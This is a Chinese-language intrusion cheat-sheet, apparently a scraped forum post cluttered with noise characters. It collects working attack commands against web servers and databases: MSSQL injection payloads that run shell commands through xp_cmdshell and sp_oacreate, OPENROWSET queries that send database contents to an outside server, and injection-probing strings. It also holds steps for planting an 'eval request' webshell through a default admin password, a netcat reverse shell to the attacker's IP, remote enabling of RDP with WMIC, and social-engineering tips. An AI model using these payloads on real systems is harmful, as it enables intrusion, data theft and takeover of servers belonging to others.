SA点数据库分离技术相关. H1 }, i% }+ X1 L% |7 i
8 R8 k) K' u2 O. D( _0 U5 B" e
% d# r2 h3 u6 W6 U% z$ YSA点数据库分离搞法+语句: I! Q/ L9 B9 e; D8 R
& v8 y6 i$ }3 B4 T
注射点不显错,执行下面三条语句页面都返回正常。
8 L, N" Z" X6 m H2 h9 j8 zand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')7 M+ v- N, N# a' }5 p, X6 E
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')4 Y' h/ |* F) ]8 a" R
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')" S* F, w: Z, I5 D+ B1 G/ g9 |- ^
可以列目录,判断系统为2000,web与数据库分离" x- H( s5 |) p- p/ I$ ^
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
/ j6 S a+ S" q, C* _% U在注射点上执行5 T; Y) C1 r/ d) o& w
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--% P% T, J2 v* j- `( L& t
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
& p, u, C3 |2 \% {/ O, z还有我用NC监听得其他端口都没有得到IP。. D& u! F2 _% P' i
' a! t/ F) o3 m- L3 Q. i
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
/ Z2 H1 f0 X6 Z7 ]6 K% s/ i! U; `'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--3 A+ ?* ~" d& L6 V9 [
7 D: Z8 o9 O/ s. v Y5 I/ e
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--4 F5 E0 p6 l; e( m) ]6 G
" p+ X7 X0 c& M$ W& b: O& {2 n现在就猜想是不是数据库是内网而且不能连外网。9 ?) @4 e* |$ A7 A) e
& z4 Z7 |. f: K9 t+ `( n& T& Y
- S o8 a& w2 D* _- Paccess导出txt文本代码 M5 f! G4 I6 z2 e- c$ D
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin% R# B. c8 @% M3 S4 m. x
# S6 F( [* r0 _ _: l3 \' @& o$ t) Q2 q: P7 x
( S( k" ?+ I2 g3 z0 }自动跳转到指定网站代码头
, x1 I* C- g7 K2 s+ S, U0 J! k<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>$ E0 j6 ?3 I8 x5 \3 \7 u" ]
9 z" ]0 Y- q' r; t
* G; q8 U9 z* h入侵java or jsp站点时默认配置文件路径:
! f. `9 G& b* h" G\web-inf\web.xml
3 d( y7 g" {$ E+ H! S4 m9 _: Gtomcat下的配置文件位置:: a* A: ]+ V# _* a
\conf\server.xml (前面加上tomcat路径)
2 Q! h9 K8 D4 J' A7 k3 _/ v2 K\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
+ @+ G+ W8 o, n$ z$ ]: }
* d% U5 e; v/ _- f" a, y" C
! P1 p9 L9 @; ^( F5 \; l% k7 z
/ _& I7 P G' U检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:% n( I: g1 L8 V8 I8 |
-1%23
0 K5 [; l$ T% Y9 v9 s3 \> " [5 j" ~0 `/ Q3 S
<
# u- |$ ^9 X8 N* o, n1 _1'+or+'1'='15 r) H# L& e7 ~7 r- z
id=8%bf
: Z( B& K+ O( A( e& A3 Q. l: o" k! g; F9 `" ~5 {
全新注入点检测试法:8 t7 R4 f3 r( p( U! s# G V2 P7 W6 M
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。" K# F/ Z- o$ E% \2 a* O
9 ~1 x1 Q* j/ [: a在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。# a @0 p8 L, _+ H2 M% V
. b+ \3 |- ?! Y搜索型注入判断方法:6 t2 k4 d8 p% e2 ^! T( o( n
北京%' and '1'='1' and '%'='
- P& m! ]! p4 N3 f" }! }北京%' and '1'='2' and '%'='" j+ L& t P) f( c2 B( H' L
4 h* B V+ P* K: e* ^9 [# Q' d) C' E4 _& c: O
COOKIES注入:
7 T0 e' |! Z- \1 ^
1 S8 V0 y& W) O* |javascript:alert(document.cookie="id="+escape("51 and 1=1"));: j0 f7 @4 t1 ?" t1 }" N
[0 ?' C N' w6 k9 j
2000专业版查看本地登录用户命令:
f. v8 K$ l' J# q9 dnet config workstation
. Q: C1 w+ ?& s& g7 C" _0 k% z$ }9 u$ q# r& _% O D
' `+ H7 D; k+ @# C
2003下查看ipsec配置和默认防火墙配置命令:5 e$ F1 U& }! \$ H+ p
netsh firewall show config% ^% J0 c0 p: o* N. G+ K) T
netsh ipsec static show all, n: F b3 M/ g4 G% S. W/ G$ G7 a
; p I: ^1 X# e( @ w g3 K- w
不指派指定策略命令:' c% U/ _* w' K2 ?. y& U
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
# A O3 K! |+ |% Nnetsh ipsec static show policy all 显示策略名, ]& K4 Y' Q$ `, S, ?' E2 h
" K5 K4 y% W/ w% f$ Q' N' }. r5 n7 t! D4 S8 S$ u K: ~; @# q
猜管理员后台小技巧:1 v' R' Q% W/ w; H6 I
admin/left.asp ' {8 W4 C# b7 A4 g
admin/main.asp+ d) e4 F7 w1 [& ^
admin/top.asp" `5 I9 \, ^! p1 a x7 C8 R6 L, |
admin/admin.asp 4 t1 q1 H. A1 l
会现出菜单导航,然后迅雷下载全部链接
, x) q# c, d5 d! K k
+ J. \0 a* O; N1 `/ N, ^5 L3 ?( q5 [7 I# r$ P6 g
社会工程学:
! H6 F4 H& _, I# r用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人$ R; R) i# X: m+ Y' L+ m
然后去骗客服4 `4 U+ B5 O" t: L' x* `% w
$ j+ W* O7 e u7 G# |' `" q$ K
* J8 u) [3 i6 ^' r5 Q. C
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 5 d F0 Z0 G- L4 K' B9 `& N4 G
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, $ F- q# Z: a2 q. K4 T
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
: M- w3 r: H7 t: R
3 {7 i& L2 k/ u, _+ h4 W
" q' u p8 _$ A0 z6 z3 K
0 h/ h& J6 g/ Z# N; z& j& J6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)1 G1 E+ l1 X2 O& E
0 G! X% I4 d" r) }% Z- i4 [, [
6 P- I! r: y" ], k8 q p+ S
: V5 z6 c, T! z LCMD加密注册表位置, H/ D$ S# Q6 l" v" T
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
. |" n- ]8 H6 A9 ^3 d! u- aAutoRun
! e' `- j+ d4 ^) G! \" K) _
7 A1 d" z# G$ i1 }% W' V(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
. q5 V. ` v6 M( X5 R, U1 ]AutoRun$ U$ {' |6 e$ n+ k8 f
! x" K Y8 s( c
5 a/ H& ~- O# \. Y- Z1 V. A. m& | ]在找注入时搜索Hidden,把他改成test
/ Y, Y' ~8 E$ `# w- h1 E$ t4 a- x! c' H3 X6 C
- @0 ^# a- ?; c+ w" s$ h+ D, S
9 z+ u4 i7 n8 _& Z
mstsc /v:IP /console 3 D' n; {+ Q( P% i, b
/ l8 z- f( Z+ {
2 m4 Y! H7 {2 a一句话开3389:: j s! k7 w# A( o, r
6 a7 [) S& L- ?/ s2 _% f9 Q
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> ) c: a( k. A' l" N8 q8 M+ f2 n0 T
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了. ]( G- M$ o1 y9 m1 _% h5 Y; d
) M' E$ t$ Y( g
/ N& J7 ?8 Z3 n知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:0 G$ ]8 g2 x$ ~5 d- F
Insert into admin(user,pwd) values('test','test')! x- ~3 s* d3 z0 j" _8 o x% n
' z, Y# m; f. f4 ^5 F; `9 G
) q: w3 V* P w, U: B! c+ mNC反弹7 ?2 K5 F k7 j Q2 ^: ?" N
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
0 A3 h5 w0 I- y: f. T然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
+ }/ M$ f7 C: S/ R# k d( f- V6 n# k$ N. R
, f) d8 w2 K6 D9 d9 j J在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
7 ~! K' n9 z2 ~! g( t( v4 X: e. H8 J6 d) t5 B
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
4 p. i- t0 r; i9 }& u例如:
# {' H K/ L. n5 t2 L$ V$ rsubst k: d:\www\ 用d盘www目录替代k盘
2 Z. W/ w4 S$ H7 Csubst k: /d 解除K盘代替 |